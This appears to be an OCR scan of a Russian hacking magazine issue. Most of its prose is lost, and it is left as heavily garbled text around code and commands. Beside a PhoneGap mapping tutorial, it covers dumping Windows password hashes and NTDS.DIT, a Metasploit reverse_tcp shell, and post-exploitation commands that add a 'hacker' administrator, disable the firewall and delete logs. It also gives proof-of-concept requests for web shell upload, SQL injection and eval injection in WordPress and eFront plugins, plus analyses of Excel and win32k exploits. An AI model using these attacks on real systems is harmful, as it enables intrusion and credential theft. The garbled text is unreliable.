        <ul id="list" data-role="listview" data-inset="true" data-split-icon="delete"></ul>
      </div>
    </div>

    n nn data-transition="pop", data-direction="reverse", .

    nn . , .

    , API Google Maps, :

    var latlng = new gm.LatLng(this.options.lat, this.options.lng);

    this.map = new gm.Map(element, {
        zoom: this.options.zoom,           // initial zoom level
        center: latlng,                    // map center
        mapTypeId: gm.MapTypeId.ROADMAP,   // map type
        disableDoubleClickZoom: true,      // no zoom on double click
        disableDefaultUI: true             // hide the default controls
    });

    gm - n, Google Maps.

    . - :

    this.person = new gm.Marker({
        map: this.map,
        icon: new gm.MarkerImage(PERSON_SPRITE_URL, new gm.Size(48, 48))
    });

    PERSON_SPRITE_URL n n Ggl -. -maps.gstatic. com/mapfiles/c/mod scout/cb scout spite api OO . png .

    , , n, , click:

    gm.event.addListener(this.map, 'click', function (event) {
        self.requestMessage(function (err, message) {
            // the dialog was cancelled or an error occurred
            if (err) return;
            // add the point and refresh the list
            self.addPoint(event.latLng, self.options.radius, message);
            self.updatePointsList();
        });
    });

    [PhoneGap.plist screenshot: EnableViewportScale = NO; ExternalHosts = Array (4 items): csi.gstatic.com, .googleapis.com, maps.google.com, maps.gstatic.com; MediaPlaybackRequiresUserAction = NO]

    n - . n n n

    . nn Geolocation API !, n n ]:

    if (navigator.geolocation) {
        function gpsSuccess(pos) {
            var lat, lng;
            if (pos.coords) {
                lat = pos.coords.latitude;
                lng = pos.coords.longitude;
            } else {
                lat = pos.latitude;
                lng = pos.longitude;
            }
            self.movePerson(new gm.LatLng(lat, lng));
        }

        // poll the position periodically
        window.setInterval(function () {
            navigator.geolocation.getCurrentPosition(gpsSuccess, $.noop, {
                enableHighAccuracy: true,
                maximumAge: ...
            });
        }, ...);
    }

    movePerson n n n getPointsInBounds() n, n

    - . n- n ? HTML5 n

    localStorage, n !n , ]. , n, , !

    - , n n . n - n - Safari Chrome. ,

    n .

    , n , , n WebKit . ~ n

    n h ~ -n n -


  • iOS

    . - (n Denwer XAMPP), ,

    . n , . , , n PhoneGap, , ,

    . , iOS-. , PhoneGap IDE .

    n iOS,

    n OS X 10.6+ ( OS X 10.6), Xcode iOS SDK . SDK , n Apple . Xcode iOS SDK [developer.apple.com/devcenter/ios/index.action] . ,

    4 . , ' Apple ( n , 5t, !. ,

    iOS Objective-C. PhoneGap,

    PhoneGap iOS. [https://github.com/callback/phonegap/zipball/1.2.0],

    iOS . , Xcode PhoneGap. , IDE -


    PhoneGap: HTML5

    . , , n Run- iPhone/iPad PhoneGap. , index.html ,- . ,

    n n, n www. ,

  • PCZONE

        if (button_id === 1) {
            // the user confirmed the deletion
            self.removePoint(point);
        }
    }, TITLE);

    , n,- , n i.i n . , n ln , l ,

    PhoneGap:

    navigator.geolocation.watchPosition(function (position) {
        self.movePerson(new gm.LatLng(
            position.coords.latitude, position.coords.longitude));
    }, function (error) {
        navigator.notification.alert('code: ' + error.code + '\nmessage: ' + error.message, $.noop, TITLE);
    }, { frequency: ... });

    - , . n Run

    , n iS -' nn n .

    iPhone, iPod iPad n, n Xcode. n nn n . :1. : n n

    PhoneGap, n, n n . .

    Appcelerator Titanium [www.appcelerator.com]. Titanium n Android iPhone, n lk.

    , n n IDE . n Tita-nium n, n

    [ $49 ]. $120 . l t Titanium , n 25 . n n n Apache 2.

    Corona SDK [www.anscamobile.com/corona] . n - iOS Android. . ,

    OpenGL. n , - : $199 n $349 iOS Android. n n IDE .

    n , JavaScript.


    : 56.84484567007557 ...

    : 56.84583899763894 ...


    n iOS, iOS ! , nn iOS Developer

    Program). n n Apple, n

    (Android, Windows Phone) n . , , n n n n - . n $99

    n . Apple , n n . n n

    n iOS n Store. , $99 n n , n - .

    nn n - n iS - ! , n n n : it .l y/tD6xA!I . , n

    . . ?

    n -n n n n iOS n PhoneGap. n Objective-C,

    n n n , n n API PhoneGap. nn n, n Android Windows Mobile 7, , - n n, n ! : phonegap.com/start). n,

    n n PhoneGap, n (phonegap.com/apps). PhoneGap-

    n n n n. n , n n,

    . n n, HTML+JS - n n , n n . , PhoneGap

    n Nitobi n l n n GitHub: github.com/phonegap). ,

    n n Nitobi n Adobe . , nn n n n n ? ::


  • . .


  • PCZONE Ant la.zhukov!Oreal.xakep.rul

    WINDOWS-APOE WINDOWS-CCTEM

    , , ,

    , NTLM. .

    .

    ? , . : S-, LM/NTLM-xe

    ; LSA, LM/NTLM-xe

    , ; , Sh-

    , ! , , ! .

    , -. : !

    , , . 7

    .

    1 PWDUMP FGDUMP , . NTLM/LM-xe .

    , DLL- SeDebugPrivilege . ,

    (NT AUTHORITY\SYSTEM) . , : ,

    ! LiveCD), , kon-boot (www.piotrbania.com/all/kon-boot), .

    (NT AUTHORITY\SYSTEM), EasyHack . . pwdump (www.foofus.net/~fizzgig/pwdump) fgdump (www.foofus.net/~fizzgig/fgdump).

    , . :

    pwdump localhost
    fgdump.exe

    . 127.0.0.1.PWDUMP l ! 127.0.0.1.CACHEDUMP

    l ! .


  • , , .

    , , pwdump, :

    > pwdump -o mytarget.log -u MYDOMAIN\someuser -p 'lamepassword' 10.1.1.1

    10.1.1 .1 - , MYDOMAIN\ someuse- , la mepasswod-

    , mytaget.log - . pwdump, fgdump , :

    > fgdump.exe -f hostfile.txt -u MYDOMAIN\someuser -T 10

    hostfile.txt- , , - .

    , ! !.

    , fgdump.exe.

    2 VOLUME SHADOW SERVICE pwdump fgdump , , , . , . ,

    SAM, , . , , - SYSTEM . , , - . - , , , . , , , .

    , >> , Volume Shadow Service ! ! .

    Windows Server 2003. , , System State ntbackup

    (Volume Shadow Copy of Shared Folders). ,

    l , SAM SYSTEM), .

    , Windows , , . , . , -

    , . HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\cachedlogonscount 0>>.

    , . .


    Widows-apoe

    w n n n pwdump

    n n n Windows Credentials Editor (WCE)

    , vssown.vbs (tools.lanmaster53.com/vssown.vbs), . . : cscript vssown.vbs /start.

    : cscript vssown.vbs /create. : cscript vssown.vbs /list.

    . Device object \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14 >> ! 14 - !. . 1. :

    \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\system32\config\SYSTEM .

    \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\system32\config\SAM .

    2. , - SAM inside l i n si d ep o.com/us/saminsi d e.shtm l l

    .

    _ ! , , ,

    ! , . ,

    SAM SYSTEM. Active Directory NTDS.DIT, :

    \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\ntds\ntds.dit .

    , SYSTEM. , ? SYSTEM NTDS.DIT,

    n n ? , , n NTDS.DIT , .

    Csaba Barta , NTDS.DIT .

    csababarta.com/downloads/


  • PCZONE

    ntds_dump_hash.zip. , . n n BackTrack 5 (n Linux),

    n . , . libesedb:

    cd libesedb
    chmod +x configure
    ./configure && make

    . , :

    cd esedbtools
    ./esedbdumphash ../../ntds.dit

    libesedb/esedbtools/ntds.dit.export/datatable. . ,

    SYSTEM:

    cd ../../creddump/
    python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

    ! ! , ! ] . , : python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable.

    , , ! ] .

    ' HASHGRAB2+ SAMDUMP2

    , . , , LiveCD !, Offline NT Password & Registry Editor),

    - , .

    HashGrab2 (py1337.get-root.com/tools/hashgrab2 ...) samdump2 (sourceforge.net/projects/ophcrack/files/samdump2/2.0.1),

    Live- . HashGrab2 Windows-, , n samdump2

    SAM SYSTEM .


    meterpreter > set payload windows/meterpreter/reverse_tcp
    meterpreter > set rhost [ ]
    meterpreter > set smbpass [ ]
    meterpreter > set smbuser [ ]
    meterpreter > set lhost [ ]
    meterpreter > exploit
    meterpreter > shell

    , , . , . ,

    getsystem. , MS09-012, MS10-015 (KiTrap0D) .

    6 PASS-THE-HASH NTLM . , . -

    :1. - , Pass The Hash, 1997 . Pass-the-Hash Toolkit (oss.coresecurity.com/projects/pshtoolkit.htm): IAM.EXE, WHOSTHERE.EXE,

    GENHASH.EXE. , GENHASH LM- NT- . WHOSTHERE.

    , -, .

    , : , / NL- . IAM. - , [ , , . .l,

    , , .

    , NL-, ,

  • . , , Windows-ccee, ? . ,

    ? -, .

    n n nwn nn . n , , n n ( nmap, - w), .

    ipconfig /all

    ipconfig /displaydns

    netstat -nabo

    netstat -s -p [tcp|udp|icmp|ip]

    netstat -r
    route print

    .

    D NS-e . . ........................................... -~

    /U-. - , , .

    ' etsta t - [, UDP, ICMP, IPI. : .. j . : .


    , , 445.

    netstat -an | findstr :445

    net view

    net user %USERNAME% /domain

    net accounts

    net accounts /domain

    net localgroup administrators

    net localgroup administrators /domain

    net config workstation

    net share

    SMB [!.

    [ '/domai', l. , , , . .

    [ ! .

    .

    .

    >> .

    , NetBIOS, , , , . . ....... .... ... .... ............................ ......................... ... .................... .... ....................................................................... .

    S - .

    ~ - R- . . . . . ...... ... ....... ....... .... ... ... ........ ....... ...... ................ ......................... .... . ....................................... ..

    type %WINDIR%\System32\drivers\etc\hosts   hosts.


  • whoami

    whoami /all

    qwinsta

    v

    set

    systeminfo (XP+I

    qprocess

    n enna - . (n~~ : n ( r ), , , , r nr . .

    ? . '/all' 510 , 510 , !

    ? ! .

    , , - . R- ! !, .

    ( uame !, , . . ................ ........... ... .... ... ................... ...... ...... ... .................. . .. ......................................... .

    - . SET , : . USERDOMAIN, USERNAME, USERPRO-; FILE, , LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .

    ; , , , : , , .

    ~ , . ~ , 10 , PID .

    schtasks /query /fo csv /v >

    %% ~ csv, .

    at

    , , , . , SYS-TEM ( Wi7x64l. , , - do_somethig.bat SYSTEM 15:41 , :

    at 15:41 /interactive "d:\pentest\do_somethig.bat" , .

    . , ............................................ ; ............................ .. .............. ..

    schtasks (XP+)

    net start

    sc query

    sc getkeyname ""

    sc queryex ""

    tasklist (+)

    taskkill [/f] /pid

    ~ , . at, .............. , .: .. ~~.~.~~.~.~~ . ~~.~~~ ~~~~~.~~ .~~~~. ~~~~~~.~~~~ .~~~.~~ .~.~~~ .~.~~.~.~~~ ~ l~~.~~:.~.~.~.~. ~~~ ~ ~ 1 ................. , .... .

    key . , PID .

    taskkill [/f] /im PID

    gpresult /z

    wevtutil el

    wevtutil qe

    nor. , noro. n , n .

    , (, . . !.

    .

    del %WINDIR%\*.log /s /q /f


    %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features

    Windows - n n no n n n. - n - nn.

    , . Windows Vista SP1/7/2008/2008R2, no , te lnet ft- ..

    %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP

    Ntsd -server tcp:port=1337 calc.exe
    Ntsd -remote tcp:server=,port=1337

    net use

    reg save HKLM\Security security.hive

    n TFTP. F- t ftp.exe .

    Windows Vista ntsd.exe, system32. . [ ), - .

    [ ). , . NTSD Backd oo.

    i .

    - , n n. n: w , , n,

    (n, n n).

    ~ security . , , system.

    reg add [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName] /t [Type] /d [Data]
    ( : /v Data /t REG_BINARY /d fe340ead)

    reg export [RegDomain]\[Key] [FileName]

    reg import [FileName]

    ~ n .

    .

    reg query [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName] ; n n .

    tree C:\ /f /a > C:\output_of_tree.txt

    dir \ /s /b | find /i "search_string"

    , , . w , , : sam_backup.dat? w, ,- , . :

    : , .

    d i 1\1 1/sl base 1/bl seac h_st i n g, .


  • CWMIC

    , , WMI (Windows Management Interface). , WMI- (WMIC): , , .

    ~ 1

    wmic baseboard get Manufacturer, Model, Product, SerialNumber, Version

    wmic nicconfig get caption, macaddress, ipaddress, DefaultIPGateway

    wmic nicconfig where "IPEnabled = 'TRUE' and DNSDomain IS NOT NULL" get DefaultIPGateway, DHCPServer, DNSDomain, DNSHostName, DNSServerSearchOrder, IPAddress, IPSubnet, MACAddress, WINSEnableLMHostsLookup, WINSPrimaryServer, WINSSecondaryServer /format:list

    wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status

    wmic os get bootdevice, caption, csname, currenttimezone, installdate, servicepackmajorversion, servicepackminorversion, systemdrive, version, windowsdirectory /format:list

    wmic product get Caption, InstallDate, Vendor

    wmic path win32_product where "name = 'Software Update'" call Uninstall

    WMI . , WMI- (computersystem, bios, ,

    , baseboard) n. . .

    : , -, I- , .

    .

    n , .

    .

    .

    : Softwae Update.

    , . .

    net user hacker hacker /add

    net localgroup administrators /add hacker
    net localgroup administrators hacker /add

    net share nothing$=C:\ /grant:hacker,FULL /unlimited

    net user username /active:yes /domain

    netsh firewall set opmode disable

    wmic product get name /value
    wmic product where name="XXX" call uninstall /nointeractive

    rundll32.exe user32.dll, LockWorkStation

    hacke .

    hacke .

    : hacke .

    - ( , ) , .

    Windows.

    , - ( , ).

    ( ) . ; .......................................................................................... : ...................................... .


  • /S
  • EASY

    JAVA

    , Java, , . , Java , Flash, , . ?

    , Java , . javatester.org/

    version.html . ,

    . ? ,

    - CVE-2010-4452, . , Metasploit'e:

    1) : use exploit/windows/browser/java_codebase_trust

    2) : set URIPATH test.php, set LPORT 88

    3) : set payload java/meterpreter/reverse_tcp

    4) : exploit

    tt :]. , Java ? . : -

    , J v- .

    , , ,

    . ? ':] JavaScipt, Jv-,

    . , , (defcon-russia.ru/wall.txt). SET (Social Engineer Toolkit).

    BackTrack 5 (www.social-engineer.org). SET , . SET :

    1) Website Attack Vectors; 2) The Java Applet Attack Method; 3) Web Templates [

    Site l ]; 4) Gmail Gmail; 5) Import your own execut­able,

    .

    - . , , Java .

    , ? ? ? ?:] , , , , . , [ :11, . , - ,

    . : SMTP [25/I , Gmail Mail.u.

    , , , , , , - . ? 150 . , IP.

    lwww. proxy . ru l, , .

    . , security. nov. u ,

    , , . :1 [ * ], [

    l :

    pro)(y -25


    - . , . - . , ?

    [ ). , , - (www.example.com:25). , . , nmap . , UDP ICMP, , -. , .

    [figure: Internet Explorer LAN proxy settings dialog: "Use a proxy server for your LAN (These settings will not apply to dial-up or VPN connections)", Address, Port, Advanced..., "Bypass proxy server for local addresses"]


  • 1 EASY

    REVERSE-POKC

    ~ , vs. ? , -, [) -

    . ? . , vs-

    -, WAF SS L- cepepa, , [, ) .

    . , [ , - ?). .

    vs- - . ?

    - . . , X-Forwarded-For, , ! , -

    , .

    (goo.gl/VObeW). , RFC 2616 1.1, , Max-Forwards . , , TRACE OPTIONS. - .

    HTTP-traceroute. Squid reverse-proxy Wikipedia.org

    reverse proxy

    , , , . , GET POST,

    . , TTL IP- . , - , - traceroute. , R- -, RFC, GET

    Max-Forwards. traceroute, , IP- . :

    HTTP-Traceroute.py -t www.victim.com -m (TRACE/GET/POST)

    CSRF

    , CSRF (Cross Site Request Forgery, ) . , - . , ,

    [, ) , [ , ) . ,

    , , ,

    . , , n JavaSc ipt . ,

    - - . . GET- : http://server.com/change_password.php?NP=new_pass, new_pass-

    , . , L' :

    ,



    . GET-an poc- . , S?

    :

    document.passwd.submit();

    l XML request? - XML request. :)

    document.passwd.submit();

    , , . ; ) .


  • EASY


    !, , digital forensics)- , .

    , ,-

    . , : ; n ;

    ; DLL- ; ; ; ; Virtual Address Descriptor; ; . .

    , , , , . Volatility (goo.gl/Hi5ip). Python'e Windows (XP), , 32- .

    , , n . , n .

    ! !, , n

    . , ,

    MoonSols DumpIt (http://goo.gl/BY1QN). - : .

    . , n , ! ,

    USB). , - ? Volatility. , Python'o, standalone- , .

    , :

    volatility.exe imageinfo -f d:\test.raw



    : imageinfo - ; -f d:\test.raw - . Volatility - . ;l (WinXPSP3x86), . , ?

    - :

    volatility pslist -f d:\test.raw --profile=WinXPSP3x86

    , , :

    volatility netscan -f d:\test.raw --profile=WinXPSP3x86

    - , , , SAM, - LSA?

    Windows .

    volatility hivelist -f d:\test.raw --profile=WinXPSP3x86

    hivelist - , .

    , :

    volatility hashdump -f d:\test.raw --profile=WinXPSP3x86 -y <SYSTEM hive offset from hivelist> -s <SAM hive offset from hivelist>

    : hashdump - ; -y 103560 - System; -s 180560 - SAM.

    , . , . , , . Volatility. , ,

    .


  • /

    -

    . , , ,

    , , .

    051,

    (ivinside.blogspot.com) [115612, . , .11

    1 n Microsoft Office 2007 Excel .xlb CVSSV2 9.3

    (AV:N/AC:M/Au:N/C:C/I:C/A:C) : 5 2011 .

    : Aniway, abysssec, sinn, juan vazquez. CVE: CVE-2011-0105.

    n , i Excel.

    .

    f:J!Iii Excel

    , !, ). .xlb.


    // ajax_save_name.php
    ob_start();
    $sessionAction = new SessionAction();
    $selectedDocuments = $sessionAction->get();
    if (removeTrailingSlash($sessionAction->getFolder()) == getParentPath($_POST['id'])
        && sizeof($selectedDocuments)) {
        if (($key = array_search(basename($_POST['id']), $selectedDocuments)) !== false) {
            $selectedDocuments[$key] = $_POST['value'];
            $sessionAction->set($selectedDocuments);
        }
        echo basename($_POST['id']) . "\n";
        displayArray($selectedDocuments);
    } elseif (removeTrailingSlash($sessionAction->getFolder()) == removeTrailingSlash($_POST['id'])) {
        $sessionAction->setFolder($_POST['id']);
    }
    writeInfo(ob_get_clean());

    BIFF8. , . BIFF- :

    BOF = workbook globals
      Workbook globals
    EOF
    BOF = worksheet
      Sheet records
    EOF
    BOF = worksheet
      Sheet records
    EOF

    :

    ID ( ) , sz ( ) (sz )

    (ID ] - . . : BOF (Begin Of File) EOF (End Of File).

    BOF, :

    BOF , BIFF8 . ~;

    2 89 ID 2 01 2 f' 2 2 ***.fcH 4 2 ID 2 4 12 4 Excel,

    BOF document type:
      0x0005 - Workbook globals
      0x0006 - Visual Basic module
      0x0010 - Worksheet
      0x0020 - Chart
      0x0040 - BIFF4 Macro sheet
      0x0100 - BIFF4 Workbook globals

    BOF 7. , . sub_30199E55.

    . . , , ,

    .

    .text:esF8e call su_11

    .text:e5F835 cmp , h

    .text:e5F838 mov [ebp+var_ED4],
    .text:e5F83E jz l_54488
    .text:e5F844 call su_11
    .text:e5F849 mov , [ebp+var_EDC]
    .text:e5F84F imul , [ebp+var_Fee]
    .text:e5F856 mov edi,
    .text:e5F858 mov , [ebp+var_EEe]
    .text:e5F85E lea , [ ++ ]
    .text:e5F862 call su_l
    .text:e5F867 push eFFFFFFFDh
    .text:e5F869 edx
    .text:e5F86A sub edx,
    .text:e5F86C add , edx
    .text:e5F86E push ; Dst

    . text:e5F86F push ; int

    .text:e5F87e mov , edi

    .text:e5F872 call sub_e199E55

    , sub_30199E55 , . , .


  • /

    public static function checkFile($name) {
        if ($GLOBALS['configuration']['file_black_list'] != '') {
            $blacklist = explode(",", $GLOBALS['configuration']['file_black_list']);
        } else {
            $blacklist = array();
        }
        $blacklist[] = 'php';
        $extension = pathinfo($name, PATHINFO_EXTENSION);
        foreach ($blacklist as $value) {
            if ($extension == trim(mb_strtolower($value))) {
                throw new EfrontFileException(_YOUCANNOTUPLOADFILESWITHTHISEXTENSION . $extension,
                                              EfrontFileException::FILE_IN_BLACK_LIST);
            }
        }
    }

    1- CheckFilell

    .text:30199E0 cmp edi, [esp+4+Dst]

    .text:30199E4 ja loc_303EE1B7

    .text:30199 E A mov , [esp+4+arg_0]

    .text:30199EE push

    .text:30199E F mov , dword_30F72C0

    .text:30199E75 push
    .text:30199E7 mov , nNumberOfBytesToRead
    .text:30199E7C push esi
    .text:30199E7D mov [esp+10h+Dst],

    . text:30199E93 mov , [esp+l0h+Dst]

    .text:30199E97 push esi ; Size

    . text:30199E98 lea edx, dword_30FEB8[ebx]

    .text :30199E9E push edx ; Src

    .text:30199E9F push ; Dst

    . text:30199EA0 sub edi, esi

    .text :30199EA2 call memcpy

    . text:30199EA7 add [esp+lCh+Dst], esi

    .text:30199EAB add , esi
    .text:30199EAD add esp, 0Ch
    .text:30199EB0 test edi, edi
    .text:30199EB2 mov dword_30F72C0,
    .text:30199EB8 jnz loc_301E0DB

    , .

    , /GS /SAFESEH . , /GS- MS Visual Studio, , . , ,

    . cookie, . 64- , , cookie. , ,

    . - . /SAFESEH SEH- .

    , , n

    . , . Visual Studio

    / SAFESEH


    -. n

    , n . , . memcpy, n , /GS . ,

    esp . , call esp .

    Microsoft Office Excel 2007 / Microsoft Office Excel 2007 SP2 .

    ,_i,J!IiitJ:I , .

    2 MS11-077 Win32k Null Pointer De-reference Vulnerability CVSSV2 ~2

    : 22011 . : KiDebug. CVE: CVE-2011-1985.

    (AV:L/AC:L/Au:N/C:C/I: /)

    win32k.sys , .

    >> n.

    IJ34!Jii :

    .text:BF9140C0 ; __stdcall NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
    .text:BF9140C0 _NtUserfnINCBOXSTRING@28 proc near ; CODE XREF: xxxDefWindowProc(x,x,x,x)+E
    .text:BF9140C0                                   ; NtUserMessageCall(x,x,x,x,x,x,x)+1

    .text:BF9140C0

    .text :BF9140C0 WND dword ptr 8

    . text :BF9140C0 arg_4 dword ptr 0Ch

    .text:BF9140C0 arg_8 dword ptr 10h

    .text:BF9140C0 arg_C dword ptr 14h

    .text:BF9140C0 arg_10 dword ptr 18h

    .text:BF9140C0 arg_14 dword ptr 1Ch

    .text:BF9140C0 arg_18 dword ptr 20h



    .text:BF9140C0
    .text:BF9140C0 mov edi, edi
    .text:BF9140C2 push ebp
    .text:BF9140C3 mov ebp, esp
    .text:BF9140C5 mov ecx, [ebp+WND]   ; WND == 0xffffffff (-1), ...
    .text:BF9140C8 mov , [ecx+20h]      ; BSOD

    NtUse MessageCall NtUsefniNCBOXSTRING , CB _ADDSTRING:

    .text:BF88EE6B ; int __stdcall NtUserMessageCall(int, int, int UnicodeString, PVOID Address, int, int, int)

    .text:BF88EEB1

    .text:BF88EEB4

    .text:BF88EEBB

    .text:BF88EEBC

    push movzx

    push push

    [ebp+arg_18) ; int , ds:_MessageTae[eax] int [ebp+arg_le) int

    .text:BF88EEBF and , Fh

    .text:BF88EEC2 push [ebp+Address] ; Address

    .text:BF88EEC5 push [ebp+UnicodeString] ; int

    .text:BF88EEC8 push [ebp+arg_4] ; int

    .text:BF88EECB push esi ; int

    .text:BF88EECC call ds:_gapfnMessageCall[eax*4] ; NtUserfnINSTRINGNULL(x,x,x,x,x,x,x)

    .rdata:BF998D68 _gapfnMessageCall dd offset _NtUserfnNCDESTROY@28

    .rdata:BF998D68 ; DATA XREF: NtUserMessageCall(x,x,x,x,x,x,x)

    .rdata:BF998D68 ; NtUserfnNCDESTROY(x,x,x,x,x,x,x)

    .rdata:BF998D6C dd offset _NtUserfnNCDESTROY@28 ; NtUserfnNCDESTROY(x,x,x,x,x,x,x)

    .rdata:BF998D70 dd offset _NtUserfnINLPCREATESTRUCT@28 ; NtUserfnINLPCREATESTRUCT(x,x,x,x,x,x,x)

    .rdata:BF998DD4 dd offset _NtUserfnINCBOXSTRING@28 ; NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)

    ,

    SendMessageCallback((HWND)-1, CB_ADDSTRING, 0, 0, 0, 0);

    SendNotifyMessage((HWND)-1, CB_ADDSTRING, 0, 0);


    , - BSoD:

    CB_ADDSTRING 0x143, CB_INSERTSTRING 0x14A, CB_FINDSTRING 0x14C, CB_SELECTSTRING 0x14D, CB_FINDSTRINGEXACT 0x158,
    LB_ADDSTRING 0x180, LB_INSERTSTRING 0x181, LB_SELECTSTRING 0x18C, LB_FINDSTRING 0x18F, LB_FINDSTRINGEXACT 0x1A2,
    LB_INSERTSTRINGUPPER 0x1AA, LB_INSERTSTRINGLOWER 0x1AB, LB_ADDSTRINGUPPER 0x1AC, LB_ADDSTRINGLOWER 0x1AD

    Windows XP SP3/XP SP2 x64, Windows 2003 Server SP2 (+itanium, x64), Windows Vista SP2/SP2 x64, Windows Server 2008 SP2 32/64/itanium, Windows 7 32/64, Windows 7 SP1 32/64, Windows Server 2008 R2 x64/itanium, R2 SP1 x64/itanium.

    MS11-077, .

    3 Wordpress Zingiri Web Shop Plugin CVSSV2 ~5

    (AV:N/AC:L/Au:N/C: /I:P/A:P)

    WordPress . , ,

    . - -,-

    , . Egidio Romano aka EgiX . EgiX 13 , , .

    /fws/addons/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php, 37-56

    . $selectedDocuments POST - value.

    $selectedDocuments displayArray() writeInfo(), , $selectedDocuments.

    witelnfoll , /fws/addons/ t i m /j s i t s/t i _ m / 1 u g i s/ j f i 1 ma g 1 j _ t _

    folde.php:

    function writeInfo($data, $die = false) {
        $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+');
        @fwrite($fp, $data);


  • /

    GetUserTimeTargetll

        @fwrite($fp, "\n\n" . date('d/M/Y H:i:s'));
        @fclose($fp);

    ! data.php, -. exploit-db.com (EDB-ID: 18111). ,

    .

    , , :

    // Arch Linux
    # pacman -S php

    // Debian-based
    # apt-get install php

    :

    $ php 18111.php

    - , - WordPress. , Joomla!, - CONFIG_SYS_ROOT_PATH.

    Wordpress Zingiri Web Shop Plugin 0.9.12 2.2.3.

    2.2.4 .

    '

    eFront

    CVSSV2 ~5

    (AV:N/AC:L/Au:N/C:P/I: /:)

    EgiX eFront. , , .

    1. .

    /www/editor/tiny_mce/plugins/save_template/save_template.php (8-18):


    if ($_POST['templateName']) {
        $dir = '../../../../content/editor_templates/' . $_SESSION['s_login'];
        if (!is_dir($dir) && !mkdir($dir, 0755)) {
            throw new Exception(_COULDNOTCREATEDIRECTORY);
        }
        $filename = $dir . '/' . $_POST['templateName'] . '.html';
        $templateContent = $_POST['templateContent'];
        if (file_exists($filename) === false) {
            $ok = file_put_contents($filename, $templateContent);
            chmod($filename, 0644);
        }
    }

    , file_put_ contents() $_POST[ 'templateName' ] $_ POST[ 'templateContent' ] , . ,

    , , php, magic_quotes_gpc. , , :

    POST /efront/www/editor/tiny_mce/plugins/save_template/save_template.php HTTP/1.1
    Host: localhost
    Content-Length:
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive

    templateName=sh.php%00&templateContent=<?php evil_code(); ?>

    2. . checkFile(), /libraries/filesystem.class.php, 3143-3154

    . FileSystemTree::uploadFile(), , checkFile()

    . , , file_black_list,

    php, php3, jsp, asp, cgi, pl, , , bat.

    php.

    3. SQL- UPDATE. getUserTimeTarget(), /libraries/tools.php : .

    , package_ID , $entity. , /www/

    periodic_updater.php:

    if ($_SESSION['s_login']) {
        $entity = getUserTimeTarget($_GET['HTTP_REFERER']);
        //$entity = $_SESSION['s_time_target'];
        //Update times for this entity
        $result = eF_executeNew("update user_times set time=time+(" . time() . "-timestamp_now),timestamp_now=" . time()
            . " where session_expired = and session_custom_identifier = '" . $_SESSION['s_custom_identifier']
            . "' and users_LOGIN = '" . $_SESSION['s_login'] . "' and entity = '" . current($entity)
            . "' and entity_id = '" . key($entity) . "'");
    }


    , $_GET['HTTP_REFERER'], getUserTimeTarget(),

    eF_executeNew() . ,

    SQL- URL :

    http://localhost/efront/www/periodic_updater.php?HTTP_REFERER=http://host/?package_ID=[SQL]

    $_SERVER['HTTP_REFERER'], , -,

    . .

    4. . /www/index.php:

    if (isset($_COOKIE['cookie_login']) && isset($_COOKIE['cookie_password'])) {
        try {
            $user = EfrontUserFactory::factory($_COOKIE['cookie_login']);
            $user->login($_COOKIE['cookie_password'], true);

    $_COOKIE['cookie_login']. EfrontUserFactory::factory(),

    , :

    GET /efront/www/index.php HTTP/1.1
    Host: localhost
    Cookie: cookie_login=admin;cookie_login=1;cookie_login=administrator;cookie_login=1;cookie_password=1
    Connection: keep-alive

    5. -. /www/student.php:

    if (isset($_GET['course']) || isset($_GET['from_course'])) {
        if ($_GET['course']) {
            $course = new EfrontCourse($_GET['course']);
        } else {
            $course = new EfrontCourse($_GET['from_course']);
        }
        $eligibility = $course->checkRules($_SESSION['s_login']);

    , $_GET['course'] $_GET['from_course']. EfrontCourse, , eval() :

    /s tudent.php?lessons_ID=1&course[id]=1&course [directions_ID]=1&course[rules]=a: 1 :{s: 19 : "1]; phpinfo();die; /* " ;a: 1 :{s: : "lesson" ;i : e ;}}


  • I Radeon 4850 2 n

    2,2 !

    n MD5 n n

    .

    bit.ly/yEhdi -

    RainbowCrack n n ! .

    bit.ly/viSB9K -n ~> .

    [iog.chivavas.org[

    n n MD5.

    , . -, ,

    ,

    . , , MD5. .

    :

    , . , .

    . -

    l l , . .

    MD5.

    MD5 128- . , 128- , . 1991

    - MD4. 1992 RFC 1321. MD5 , CMS

    - SSL-. , MD5 , 1993 .

    , . , 1996-, , MD5. , ,

    SHA-1 ( , , SHA-2) RIPEMD-160.

    MD5 1 2004 . CertainKey Cryptosystems MD5CRK -

    . - . 24 2004 , - ,


    [figure: rcrack output listing "plaintext of <hash> is <password>" for the cracked hashes]

    Linux . n : LM/NTLM, MD5 SHA1. , - .

    > . 3 MD5, SHA1, LM NTLM.

    , >> . : LM/NTLM, MD5 SHA1 - 200 . .

    rtgen, RainbowCrack. n :

    hash_algorithm - [LM, NTLM, MD5 SHA1);

    charset - , charset.txt;

    plaintext_len_min plaintext_len_max - ; table_index, chain_len, chain_num part_index - , (bit.ly/dT8M).

    n: 1. table_index - >> ,

    . , .

    2. chain_len - n . 3. chain_num - n . 4. part_index - , .

    [ 0). >> MD5:

    rtgen.exe md5 loweralpha-numeric 1 7 0 2000 97505489 0

    , . Intel Atom N450

    :). md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt 1,5 .

    , . n

    tsot.exe:

    rtsort.exe md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt

    l . : d8578edf8458ce06fbc5bb76a58c5ca4. rcrack_gui.exe

    Add Hash ... File . . >> . Search Rainbow Tables ... Rainbow .

